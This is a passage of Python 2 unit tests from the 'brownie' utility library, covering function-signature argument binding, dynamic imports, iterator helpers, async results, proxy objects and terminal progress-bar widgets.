Assert(sig.bind_arguments((1, 2), {'c': 3})) == dict(a=1, b=2, c=3)
tests = [
([('a', 1), ('b', 2)], "'.' is missing"),
([('a', 1)], "'.' and '.' are missing"),
([], "'.', '.' and '.' are missing")
]
all_names = set('abc')
for args, message in tests:
names, values = [], []
for name, value in args:
names.append(name)
values.append(value)
with Assert.raises(ValueError) as exc_args:
sig.bind_arguments(values)
with Assert.raises(ValueError) as exc_kwargs:
sig.bind_arguments(kwargs=dict(args))
for exc in [exc_args, exc_kwargs]:
err_msg = exc.args[0].obj
assert re.match(message, err_msg) is not None
for name in all_names.difference(names):
assert name in err_msg
with Assert.raises(ValueError) as exc:
sig.bind_arguments((1, 2, 3), {'c': 4})
Assert(exc.args[0]) == "got multiple values for 'c'"
@test
def arguments_only_keyword_arguments(self):
sig = Signature.from_function(lambda a=1, b=2, c=3: None)
Assert(sig.bind_arguments()) == dict(a=1, b=2, c=3)
Assert(sig.bind_arguments(('a', ))) == dict(a='a', b=2, c=3)
Assert(sig.bind_arguments((), {'a': 'a'})) == dict(a='a', b=2, c=3)
@test
def arguments_arbitary_positionals(self):
sig = Signature.from_function(lambda *args: None)
Assert(sig.bind_arguments()) == {'args': ()}
Assert(sig.bind_arguments((1, 2, 3))) == {'args': (1, 2, 3)}
@test
def arguments_mixed_positionals(self):
sig = Signature.from_function(lambda a, b, *args: None)
Assert(sig.bind_arguments((1, 2))) == dict(a=1, b=2, args=())
Assert(sig.bind_arguments((1, 2, 3))) == dict(a=1, b=2, args=(3, ))
with Assert.raises(ValueError):
Assert(sig.bind_arguments())
@test
def arguments_arbitary_keyword_arguments(self):
sig = Signature.from_function(lambda **kwargs: None)
Assert(sig.bind_arguments()) == {'kwargs': {}}
Assert(sig.bind_arguments((), {'a': 1})) == {'kwargs': {'a': 1}}
@test
def arguments_mixed_keyword_arguments(self):
sig = Signature.from_function(lambda a=1, b=2, **kwargs: None)
Assert(sig.bind_arguments()) == dict(a=1, b=2, kwargs={})
Assert(sig.bind_arguments((3, 4))) == dict(a=3, b=4, kwargs={})
Assert(sig.bind_arguments((), {'c': 3})) == dict(
a=1,
b=2,
kwargs=dict(c=3)
)
@test
def arguments_mixed_positional_arbitary_keyword_arguments(self):
sig = Signature.from_function(lambda a, b, **kwargs: None)
Assert(sig.bind_arguments((1, 2))) == dict(a=1, b=2, kwargs={})
Assert(sig.bind_arguments((1, 2), {'c': 3})) == dict(
a=1,
b=2,
kwargs=dict(c=3)
)
Assert(sig.bind_arguments((), dict(a=1, b=2))) == dict(
a=1,
b=2,
kwargs={}
)
with Assert.raises(ValueError):
sig.bind_arguments()
with Assert.raises(ValueError):
sig.bind_arguments((1, 2), {'a': 3})
@test
def arguments_mixed_keyword_arguments_arbitary_positionals(self):
sig = Signature.from_function(lambda a=1, b=2, *args: None)
Assert(sig.bind_arguments()) == dict(a=1, b=2, args=())
Assert(sig.bind_arguments((3, 4))) == dict(a=3, b=4, args=())
Assert(sig.bind_arguments((3, 4, 5))) == dict(a=3, b=4, args=(5, ))
Assert(sig.bind_arguments((), {'a': 3, 'b': 4})) == dict(
a=3, b=4, args=()
)
with Assert.raises(ValueError):
sig.bind_arguments((3, ), {'a': 4})
tests = Tests([TestFromFunction, TestBindArguments])
########NEW FILE########
__FILENAME__ = importing
# coding: utf-8
"""
brownie.tests.importing
~~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.importing`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
from attest import Tests, TestBase, Assert, test
from brownie.importing import import_string
class TestImportString(TestBase):
@test
def by_name(self):
import __main__
module = import_string('__main__')
Assert(module).is_(__main__)
@test
def by_path(self):
import brownie.itools
module = import_string('brownie.itools')
Assert(module).is_(brownie.itools)
@test
def import_object(self):
from brownie.itools import chain
func = import_string('brownie.itools.chain')
Assert(func).is_(chain)
@test
def colon_notation(self):
import brownie.itools
module = import_string('brownie:itools')
Assert(module).is_(brownie.itools)
func = import_string('brownie.itools:chain')
Assert(func).is_(brownie.itools.chain)
@test
def invalid_name(self):
cases = [
('brownie:itools.chain', 'itools.chain'),
('brownie-itools:chain', 'brownie-itools')
]
for test, invalid_identifier in cases:
with Assert.raises(ValueError) as exc:
import_string(test)
Assert(invalid_identifier).in_(exc.args[0])
@test
def import_non_existing_module(self):
with Assert.raises(ImportError):
import_string('foobar')
tests = Tests([TestImportString])
########NEW FILE########
__FILENAME__ = itools
# coding: utf-8
"""
brownie.tests.itools
~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.itools`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from attest import Tests, Assert
from brownie.itools import (
izip_longest,
product,
compress,
count,
permutations,
combinations_with_replacement,
starmap,
grouped,
unique,
chain,
flatten
)
tests = Tests()
@tests.test
def test_chain():
Assert(list(chain([1, 2], [3, 4]))) == [1, 2, 3, 4]
Assert(list(chain.from_iterable([[1, 2], [3, 4]]))) == [1, 2, 3, 4]
@tests.test
def test_izip_longest():
tests = [
(((['a', 'b'], ['c', 'd']), {}), [('a', 'c'), ('b', 'd')]),
(((['a'], ['c', 'd']), {}), [('a', 'c'), (None, 'd')]),
(((['a'], ['c', 'd']), {'fillvalue': 1}), [('a', 'c'), (1, 'd')])
]
for test, result in tests:
args, kwargs = test
Assert(list(izip_longest(*args, **kwargs))) == result
@tests.test
def test_permutations():
tests = [
((('abc', )), ['abc', 'acb', 'bac', 'bca', 'cab', 'cba']),
((('abc', 1)), ['a', 'b', 'c']),
((('abc', 2)), ['ab', 'ac', 'ba', 'bc', 'ca', 'cb']),
((('abc', 4)), [])
]
for test, result in tests:
result = map(tuple, result)
Assert(list(permutations(*test))) == result
@tests.test
def test_product():
tests = [
((('ABCD', 'xy'), {}), ['Ax', 'Ay', 'Bx', 'By', 'Cx', 'Cy', 'Dx', 'Dy']),
((('01', ), {'repeat': 3}), [
'000', '001', '010', '011', '100', '101', '110', '111'
])
]
for test, result in tests:
args, kwargs = test
result = map(tuple, result)
Assert(list(product(*args, **kwargs))) == result
@tests.test
def test_starmap():
add = lambda a, b: a + b
Assert(list(starmap(add, [(1, 2), (3, 4)]))) == [3, 7]
@tests.test
def test_combinations_with_replacement():
tests = [
(('ABC', 2), ['AA', 'AB', 'AC', 'BB', 'BC', 'CC']),
(('ABC', 1), ['A', 'B', 'C']),
(('ABC', 3), [
'AAA', 'AAB', 'AAC', 'ABB', 'ABC', 'ACC', 'BBB', 'BBC', 'BCC', 'CCC'
])
]
for test, result in tests:
result = map(tuple, result)
Assert(list(combinations_with_replacement(*test))) == result
@tests.test
def test_compress():
tests = [
(('ABCDEF', []), []),
(('ABCDEF', [0, 0, 0, 0, 0, 0]), []),
(('ABCDEF', [1, 0, 1, 0, 1, 0]), ['A', 'C', 'E']),
(('ABCDEF', [0, 1, 0, 1, 0, 1]), ['B', 'D', 'F']),
(('ABCDEF', [1, 1, 1, 1, 1, 1]), ['A', 'B', 'C', 'D', 'E', 'F'])
]
for test, result in tests:
Assert(list(compress(*test))) == result
@tests.test
def test_count():
tests = [
((), [0, 1, 2, 3, 4]),
((1, ), [1, 2, 3, 4, 5]),
((0, 2), [0, 2, 4, 6, 8])
]
for test, result in tests:
c = count(*test)
Assert([c.next() for _ in result]) == result
@tests.test
def test_grouped():
tests = [
((0, 'abc'), []),
((2, 'abc'), [('a', 'b'), ('c', None)]),
((2, 'abc', 1), [('a', 'b'), ('c', 1)])
]
for test, result in tests:
Assert(list(grouped(*test))) == result
@tests.test
def test_unique():
tests = [
('aabbcc', 'abc'),
('aa', 'a'),
(([1, 2], [1, 2], [3, 4], 5, 5, 5), ([1, 2], [3, 4], 5))
]
for test, result in tests:
Assert(list(unique(test))) == list(result)
Assert(list(unique('aaabbbbccc', seen='ab'))) == ['c']
@tests.test
def test_flatten():
tests = [
(([1, 2, 3], ), [1, 2, 3]),
(([1, [2, 3]], ), [1, 2, 3]),
(([1, [2, [3]]], ), [1, 2, 3]),
(([1, [2, [3], 4], 5, 6], ), [1, 2, 3, 4, 5, 6]),
((['foo', 'bar'], ), ['foo', 'bar']),
((['ab', 'cd'], ()), ['a', 'b', 'c', 'd'])
]
for args, result in tests:
Assert(list(flatten(*args))) == result
########NEW FILE########
__FILENAME__ = parallel
# coding: utf-8
"""
brownie.tests.parallel
~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.parallel`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import time
from threading import Thread
from attest import Tests, Assert, TestBase, test
from brownie.parallel import get_cpu_count, AsyncResult, TimeoutError
tests = Tests()
@tests.test
def test_get_cpu_count():
try:
Assert(get_cpu_count()) > 0
Assert(get_cpu_count()) == get_cpu_count()
except NotImplementedError:
# make sure default is returned if the number of processes cannot be
# determined
Assert(get_cpu_count(2)) == 2
class TestAsyncResult(TestBase):
@test
def wait(self):
aresult = AsyncResult()
def setter(aresult):
time.sleep(1)
aresult.set('foo')
t = Thread(target=setter, args=(aresult, ))
t.start()
with Assert.not_raising(TimeoutError):
aresult.wait(2)
@test
def get(self):
aresult = AsyncResult()
with Assert.raises(TimeoutError):
aresult.get(0.1)
def setter(aresult):
time.sleep(1)
aresult.set('foo')
t = Thread(target=setter, args=(aresult, ))
t.start()
with Assert.not_raising(TimeoutError):
Assert(aresult.get(2)) == 'foo'
aresult.set('foo')
Assert(aresult.get()) == 'foo'
aresult = AsyncResult()
aresult.set(ValueError(), success=False)
with Assert.raises(ValueError):
aresult.get()
@test
def callback_errback(self):
testruns = (['callback', True], ['errback', False])
for kwarg, success in testruns:
l = []
callback = lambda obj, l=l: l.append(obj)
aresult = AsyncResult(**{kwarg: callback})
assert not aresult.ready
aresult.set('foo', success=success)
Assert(len(l)) == 1
Assert(l[0]) == 'foo'
@test
def repr(self):
aresult = AsyncResult()
Assert(repr(aresult)) == 'AsyncResult()'
aresult = AsyncResult(callback=1)
Assert(repr(aresult)) == 'AsyncResult(callback=1)'
aresult = AsyncResult(errback=1)
Assert(repr(aresult)) == 'AsyncResult(errback=1)'
aresult = AsyncResult(callback=1, errback=2)
Assert(repr(aresult)) == 'AsyncResult(callback=1, errback=2)'
tests.register(TestAsyncResult)
########NEW FILE########
__FILENAME__ = proxies
# coding: utf-8
"""
brownie.tests.proxies
~~~~~~~~~~~~~~~~~~~~~
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
import sys
from attest import Tests, TestBase, test, test_if, Assert
from brownie.proxies import as_proxy, get_wrapped, LazyProxy
from brownie.datastructures import missing
GE_PYTHON_26 = sys.version_info >= (2, 6)
tests = Tests()
class TestAsProxy(TestBase):
@test
def default_repr(self):
proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
Assert(repr(proxy_cls(1))) == '1'
@test
def setting_repr(self):
class FooProxy(object):
def repr(self, proxied):
return 'FooProxy(%s)' % repr(proxied)
FooProxy = as_proxy(FooProxy)
p = FooProxy(1)
Assert(repr(p)) == 'FooProxy(1)'
@test
def default_attribute_handling(self):
proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
class Foo(object):
a = 1
proxy = proxy_cls(Foo())
Assert(proxy.a) == 1
proxy.a = 2
Assert(proxy.a) == 2
@test
def attribute_handling(self):
getattr_access = []
setattr_access = []
class FooProxy(object):
def getattr(self, proxied, name):
getattr_access.append(name)
return getattr(proxied, name)
def setattr(self, proxied, name, obj):
setattr_access.append((name, obj))
return setattr(proxied, name, obj)
FooProxy = as_proxy(FooProxy)
class Foo(object):
a = 1
proxy = FooProxy(Foo())
Assert(proxy.a) == 1
proxy.a = 2
Assert(getattr_access) == ['a']
Assert(setattr_access) == [('a', 2)]
@test
def default_special_method_handling(self):
proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
proxy = proxy_cls(1)
Assert(proxy + 1) == 2
@test
def special_method_handling(self):
def simple_method_handler(
self, proxied, name, get_result, *args, **kwargs
):
method_calls.append((name, args, kwargs))
return missing
def advanced_method_handler(
self, proxied, name, get_result, *args, **kwargs
):
method_calls.append((name, args, kwargs))
return get_result(proxied, *args, **kwargs)
for handler in [simple_method_handler, advanced_method_handler]:
class FooProxy(object):
method = handler
FooProxy = as_proxy(FooProxy)
method_calls = []
proxy = FooProxy(1)
Assert(proxy + 1) == 2
Assert(proxy - 1) == 0
Assert(proxy * 1) == 1
Assert(proxy / 1) == 1
Assert(proxy < 1) == False
Assert(method_calls) == [
('__add__', (1, ), {}),
('__sub__', (1, ), {}),
('__mul__', (1, ), {}),
('__div__', (1, ), {}),
('__lt__', (1, ), {})
]
@test
def proper_wrapping(self):
class FooProxy(object):
"""A little bit of documentation."""
proxy_cls = as_proxy(FooProxy)
Assert(proxy_cls.__name__) == FooProxy.__name__
Assert(proxy_cls.__module__) == FooProxy.__module__
Assert(proxy_cls.__doc__) == FooProxy.__doc__
@test
def forcing(self):
func = lambda: 1
class FooProxy(object):
def method(self, proxied, name, get_result, *args, **kwargs):
return get_result(proxied(), *args, **kwargs)
def force(self, proxied):
return proxied()
FooProxy = as_proxy(FooProxy)
proxy = FooProxy(func)
Assert(proxy + proxy) == 2
a = FooProxy(lambda: 1)
b = FooProxy(lambda: 2)
Assert(a - b) == -1
Assert(b - a) == 1
@test
def getattr_not_called_on_method(self):
getattr_access = []
method_access = []
class FooProxy(object):
def method(self, proxied, name, get_result, *args, **kwargs):
method_access.append(name)
return get_result(proxied, *args, **kwargs)
def getattr(self, proxied, name):
getattr_access.append(name)
return getattr(proxied, name)
FooProxy = as_proxy(FooProxy)
class Foo(object):
spam = 1
def __add__(self, other):
return None
p = FooProxy(Foo())
p.spam
p + p
Assert(method_access) == ['__add__']
Assert(getattr_access) == ['spam']
@test
def nonzero_via_len(self):
class Foo(object):
def __len__(self):
return 0
class Bar(object):
def __len__(self):
return 1
proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
assert not proxy_cls(Foo())
assert proxy_cls(Bar())
@test
def getitem_based_iteration(self):
class Foo(object):
def __getitem__(self, key):
if key >= 3:
raise IndexError(key)
return key
proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
proxy = proxy_cls(Foo())
Assert(list(proxy)) == [0, 1, 2]
@test
def reversed(self):
class Foo(object):
def __getitem__(self, key):
if key >= 3:
raise IndexError(key)
return key
def __len__(self):
return 3
class Bar(object):
def __reversed__(self):
yield 2
yield 1
yield 0
proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
Assert(list(reversed(proxy_cls(Foo())))) == [2, 1, 0]
Assert(list(reversed(proxy_cls(Bar())))) == [2, 1, 0]
@test
def contains(self):
class Foo(object):
def __getitem__(self, key):
if key >= 3:
raise IndexError(key)
return key
class Bar(object):
def __iter__(self):
yield 0
yield 1
yield 2
class Baz(object):
def __contains__(self, other):
return other in (0, 1, 2)
proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
for cls in (Foo, Bar, Baz):
for i in xrange(3):
assert i in proxy_cls(cls())
@test
def getslice(self):
class Foo(object):
def __getitem__(self, key):
return [0, 1, 2][key]
def __len__(self):
return 3
class Bar(object):
def __getslice__(self, i, j):
return [0, 1, 2][i:j]
def __len__(self):
return 3
proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
a = proxy_cls(Foo())
b = proxy_cls(Bar())
Assert(a[:]) == b[:] == [0, 1, 2]
Assert(a[1:]) == b[1:] == [1, 2]
Assert(a[1:-1]) == b[1:-1] == [2]
Assert(a[:-1]) == b[:-1] == [0, 1]
@test
def setslice(self):
class Foo(object):
def __init__(self):
self.sequence = [0, 1, 2]
def __eq__(self, other):
if isinstance(other, list):
return self.sequence == other
return self.sequence == other.sequence
def __ne__(self, other):
return self.sequence != other.sequence
__hash__ = None
def __len__(self):
return len(self.sequence)
def __repr__(self):
return repr(self.sequence)
class Bar(Foo):
def __setitem__(self, key, value):
self.sequence[key] = value
class Baz(Foo):
def __setslice__(self, i, j, value):
self.sequence[i:j] = value
proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
make_proxies = lambda: (proxy_cls(Bar()), proxy_cls(Baz()))
a, b = make_proxies()
a[:] = b[:] = 'abc'
Assert(a) == b == ['a', 'b', 'c']
a, b = make_proxies()
a[1:] = b[1:] = 'bc'
Assert(a) == b == [0, 'b', 'c']
a, b = make_proxies()
a[1:-1] = b[1:-1] = ['b']
Assert(a) == b == [0, 'b', 2]
a, b = make_proxies()
a[:-1] = b[:-1] = ['a', 'b']
Assert(a) == b == ['a', 'b', 2]
@test
def delslice(self):
class Foo(object):
def __init__(self):
self.sequence = [0, 1, 2]
def __eq__(self, other):
if isinstance(other, list):
return self.sequence == other
return self.sequence == other.sequence
def __ne__(self, other):
return self.sequence != other.sequence
__hash__ = None
def __len__(self):
return len(self.sequence)
def __repr__(self):
return repr(self.sequence)
class Bar(Foo):
def __delitem__(self, key):
del self.sequence[key]
class Baz(Foo):
def __delslice__(self, i, j):
del self.sequence[i:j]
proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
make_proxies = lambda: (proxy_cls(Bar()), proxy_cls(Baz()))
a, b = make_proxies()
del a[:]
del b[:]
Assert(a) == b == []
a, b = make_proxies()
del a[1:]
del b[1:]
Assert(a) == b == [0]
a, b = make_proxies()
del a[1:-1]
del b[1:-1]
Assert(a) == b == [0, 2]
a, b = make_proxies()
del a[:-1]
del b[:-1]
Assert(a) == b == [2]
@test_if(GE_PYTHON_26)
def dir(self):
class Foo(object):
bar = None
def spam(self):
pass
def eggs(self):
pass
proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
Assert(dir(Foo)) == dir(proxy_cls(Foo))
tests.register(TestAsProxy)
@tests.test
def test_get_wrapped():
proxy_cls = as_proxy(type('FooProxy', (object, ), {}))
wrapped = 1
Assert(get_wrapped(proxy_cls(wrapped))).is_(wrapped)
class TestLazyProxy(TestBase):
@test
def special(self):
p = LazyProxy(lambda: 1)
Assert(p + p) == 2
Assert(p + 1) == 2
Assert(1 + p) == 2
@test
def getattr(self):
p = LazyProxy(int)
Assert(p).imag = 0.0
@test
def setattr(self):
class Foo(object): pass
foo = Foo()
p = LazyProxy(lambda: foo)
p.a = 1
Assert(p.a) == 1
Assert(foo.a) == 1
@test
def repr(self):
p = LazyProxy(int)
Assert(repr(p)) == 'LazyProxy(%r)' % int
@test
def contains(self):
p = LazyProxy(lambda: "abc")
assert "b" in p
@test
def getslice(self):
p = LazyProxy(lambda: "abc")
assert p[1:2] == "b"
tests.register(TestLazyProxy)
########NEW FILE########
__FILENAME__ = progress
# coding: utf-8
"""
brownie.tests.terminal.progress
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.terminal.progress`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import time
from StringIO import StringIO
from brownie.terminal import TerminalWriter
from brownie.terminal.progress import (
ProgressBar, Widget, TextWidget, HintWidget, PercentageWidget, BarWidget,
PercentageBarWidget, parse_progressbar, StepWidget, bytes_to_string,
count_digits, TimeWidget, DataTransferSpeedWidget
)
from attest import Tests, TestBase, test, Assert
tests = Tests([])
@tests.test
def test_count_digits():
Assert(count_digits(10)) == 2
Assert(count_digits(0)) == 1
Assert(count_digits(-10)) == 3
@tests.test
def test_bytes_to_string():
Assert(bytes_to_string(1000)) == '1000B'
si = bytes_to_string(1000, binary=False)
Assert('kB').in_(si)
Assert('1').in_(si)
@tests.test
def test_parse_progressbar():
tests = [
('foobar', [['text', 'foobar']]),
('$foo bar', [['foo', None], ['text', ' bar']]),
('$foo $$bar', [['foo', None], ['text', ' $bar']]),
('$foo:spam bar', [['foo', 'spam'], ['text', ' bar']]),
('$foo:""', [['foo', '']]),
('$foo:"spam eggs" bar', [['foo', 'spam eggs'], ['text', ' bar']]),
('$foo:"spam\\" eggs" bar', [['foo', 'spam\" eggs'], ['text', ' bar']])
]
for test, result in tests:
Assert(parse_progressbar(test)) == result
class TestWidget(TestBase):
@test
def size_hint(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer)
widget = Widget()
assert not widget.provides_size_hint
Assert(widget.size_hint(progressbar)).is_(None)
@test
def init(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer)
widget = Widget()
with Assert.raises(NotImplementedError) as exc:
widget.init(progressbar, writer.get_width())
Assert(exc.args[0]) == 'Widget.init'
@test
def update(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer)
widget = Widget()
with Assert.raises(NotImplementedError) as exc:
widget.update(progressbar, writer.get_width())
Assert(exc.args[0]) == 'Widget.update'
@test
def finish(self):
class MyWidget(Widget):
update_called = False
def update(self, writer, remaining_width, **kwargs):
self.update_called = True
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer)
widget = MyWidget()
widget.finish(progressbar, writer.get_width())
assert widget.update_called
@test
def repr(self):
widget = Widget()
Assert(repr(widget)) == 'Widget()'
tests.register(TestWidget)
@tests.test
def test_text_widget():
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer)
widget = TextWidget('foobar')
assert widget.provides_size_hint
Assert(widget.size_hint(progressbar)) == len('foobar')
Assert(widget.init(progressbar, writer.get_width())) == 'foobar'
Assert(widget.update(progressbar, writer.get_width())) == 'foobar'
Assert(widget.finish(progressbar, writer.get_width())) == 'foobar'
Assert(repr(widget)) == "TextWidget('foobar')"
@tests.test
def test_hint_widget():
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer)
widget = HintWidget('foo')
assert not widget.provides_size_hint
Assert(widget.init(progressbar, writer.get_width())) == 'foo'
Assert(widget.update(progressbar, writer.get_width(), hint='bar')) == 'bar'
Assert(widget.update(progressbar, writer.get_width(), hint='baz')) == 'baz'
Assert(widget.finish(progressbar, writer.get_width(), hint='spam')) == 'spam'
Assert(repr(widget)) == "HintWidget('foo')"
widget.finish(progressbar, writer.get_width()) == u''
class TestPercentageWidget(TestBase):
@test
def size_hint(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer, maxsteps=20)
widget = PercentageWidget()
assert widget.provides_size_hint
Assert(widget.size_hint(progressbar)) == 2
progressbar.step = 1
Assert(widget.size_hint(progressbar)) == 2
progressbar.step = 2
Assert(widget.size_hint(progressbar)) == 3
progressbar.step = 20
Assert(widget.size_hint(progressbar)) == 4
@test
def init(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer, maxsteps=100)
widget = PercentageWidget()
Assert(widget.init(progressbar, writer.get_width())) == '0%'
@test
def update(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer, maxsteps=20)
widget = PercentageWidget()
widget.init(progressbar, writer.get_width())
for i in xrange(5, 96, 5):
progressbar.step += 1
result = widget.update(progressbar, writer.get_width())
Assert(result) == '%i%%' % i
@test
def finish(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer, maxsteps=100)
widget = PercentageWidget()
widget.init(progressbar, writer.get_width())
Assert(widget.finish(progressbar, writer.get_width())) == '100%'
@test
def repr(self):
widget = PercentageWidget()
Assert(repr(widget)) == 'PercentageWidget()'
tests.register(TestPercentageWidget)
class TestBarWidget(TestBase):
@test
def init(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer)
widget = BarWidget()
Assert(widget.init(progressbar, 8)) == '[###...]'
@test
def update(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer)
states = [
'[.###..]',
'[..###.]',
'[...###]',
'[..###.]',
'[.###..]',
'[###...]',
'[.###..]'
]
widget = BarWidget()
for state in states:
Assert(widget.update(progressbar, 8)) == state
widget = BarWidget()
widget.position = 10
Assert(widget.update(progressbar, 8)) == '[..###.]'
Assert(widget.update(progressbar, 8)) == '[.###..]'
tests.register(TestBarWidget)
class TestPercentageBarWidget(TestBase):
@test
def init(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer, maxsteps=10)
widget = PercentageBarWidget()
Assert(widget.init(progressbar, 12)) == '[..........]'
@test
def update(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer, maxsteps=10)
widget = PercentageBarWidget()
states = [
'[%s]' % (x + '.' * (10 - len(x))) for x in (
'#' * i for i in xrange(1, 11)
)
]
for state in states:
progressbar.step += 1
Assert(widget.update(progressbar, 12)) == state
@test
def finish(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer, maxsteps=10)
widget = PercentageBarWidget()
Assert(widget.finish(progressbar, 12)) == '[##########]'
tests.register(TestPercentageBarWidget)
class TestStepWidget(TestBase):
@test
def init(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer, maxsteps=20)
widget = StepWidget()
Assert(widget.init(progressbar, writer.get_width())) == '0 of 20'
Assert(widget.size_hint(progressbar)) == 7
with Assert.raises(ValueError):
StepWidget('foo')
with Assert.not_raising(ValueError):
StepWidget('bytes')
@test
def update(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer, maxsteps=20)
widget = StepWidget()
widget.init(progressbar, writer.get_width())
for i in xrange(1, 21):
progressbar.step += 1
result = widget.update(progressbar, writer.get_width())
Assert(len(result)) == widget.size_hint(progressbar)
Assert(result) == '%i of 20' % i
@test
def finish(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer, maxsteps=20)
widget = StepWidget()
progressbar.step = progressbar.maxsteps
Assert(widget.finish(progressbar, writer.get_width())) == '20 of 20'
@test
def units(self):
class FooStepWidget(StepWidget):
units = {'foo': lambda x: str(x) + 'spam'}
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer, maxsteps=20)
widget = FooStepWidget('foo')
Assert(widget.init(progressbar, 100)) == '0spam of 20spam'
progressbar.step +=1
Assert(widget.init(progressbar, 100)) == '1spam of 20spam'
progressbar.step = progressbar.maxsteps
Assert(widget.finish(progressbar, 100)) == '20spam of 20spam'
tests.register(TestStepWidget)
class TestTimeWidget(TestBase):
@test
def init(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer)
widget = TimeWidget()
Assert(widget.init(progressbar, 100)) == '00:00:00'
@test
def update(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer)
widget = TimeWidget()
widget.init(progressbar, 100)
time.sleep(1)
Assert(widget.update(progressbar, 100)) == '00:00:01'
tests.register(TestTimeWidget)
class TestDataTransferSpeedWidget(TestBase):
@test
def init(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer)
widget = DataTransferSpeedWidget()
Assert(widget.init(progressbar, 100)) == '0kb/s'
@test
def update(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer)
widget = DataTransferSpeedWidget()
widget.init(progressbar, 100)
time.sleep(1)
progressbar.step += 50
speed = float(widget.update(progressbar, 100)[:-4])
Assert(speed) > 45.0
Assert(speed) < 55.0
time.sleep(2)
progressbar.step += 50
speed = float(widget.update(progressbar, 100)[:-4])
Assert(speed) > 20.0
Assert(speed) < 30.0
tests.register(TestDataTransferSpeedWidget)
class TestProgressBar(TestBase):
@test
def from_string(self):
stream = StringIO()
writer = TerminalWriter(stream)
with Assert.raises(ValueError) as exc:
ProgressBar.from_string('$foo', writer)
Assert(exc.args[0]) == 'widget not found: foo'
progressbar = ProgressBar.from_string(
'hello $hint:world $percentage', writer, maxsteps=10
)
progressbar.init()
progressbar.finish(hint='me')
Assert(stream.getvalue()) == 'hello world 0%\rhello me 100%\n'
@test
def init(self):
writer = TerminalWriter(StringIO())
sized_widgets = PercentageWidget, PercentageBarWidget
for sized in sized_widgets:
with Assert.raises(ValueError):
ProgressBar([sized()], writer)
@test
def step(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer)
Assert(progressbar.step) == 0
progressbar.step = 100
Assert(progressbar.step) == 100
progressbar = ProgressBar([], writer, maxsteps=100)
Assert(progressbar.step) == 0
progressbar.step = 100
Assert(progressbar.step) == 100
with Assert.raises(ValueError):
progressbar.step = 200
@test
def iter(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer)
Assert(iter(progressbar)).is_(progressbar)
@test
def get_widgets_by_priority(self):
class ComparableWidget(Widget):
def __eq__(self, other):
return self.__class__ is other.__class__
def __ne__(self, other):
return not self.__eq__(other)
__hash__ = None
class FooWidget(ComparableWidget):
priority = 1
class BarWidget(ComparableWidget):
priority = 2
class BazWidget(ComparableWidget):
priority = 3
widgets = [BarWidget(), FooWidget(), BazWidget()]
writer = TerminalWriter(StringIO())
progressbar = ProgressBar(widgets, writer)
Assert(progressbar.get_widgets_by_priority()) == [
(2, BazWidget()), (0, BarWidget()), (1, FooWidget())
]
@test
def get_usable_width(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([TextWidget('foobar')], writer)
Assert(progressbar.get_usable_width()) == writer.get_usable_width() - 6
@test
def write(self):
stream = StringIO()
writer = TerminalWriter(stream, prefix='spam')
writer.indent()
progressbar = ProgressBar([], writer)
progressbar.write('foo', update=False)
Assert(stream.getvalue()) == 'spam foo'
progressbar.write('bar')
Assert(stream.getvalue()) == 'spam foo\rspam bar'
@test
def contextmanager_behaviour(self):
class MyProgressBar(ProgressBar):
init_called = False
finish_called = False
def init(self):
self.init_called = True
def finish(self):
self.finish_called = True
writer = TerminalWriter(StringIO())
progressbar = MyProgressBar([], writer)
with progressbar as foo:
pass
Assert(foo).is_(progressbar)
assert progressbar.init_called
assert progressbar.finish_called
@test
def repr(self):
writer = TerminalWriter(StringIO())
progressbar = ProgressBar([], writer)
Assert(repr(progressbar)) == 'ProgressBar([], %r, maxsteps=None)' % writer
progressbar = ProgressBar([], writer, maxsteps=100)
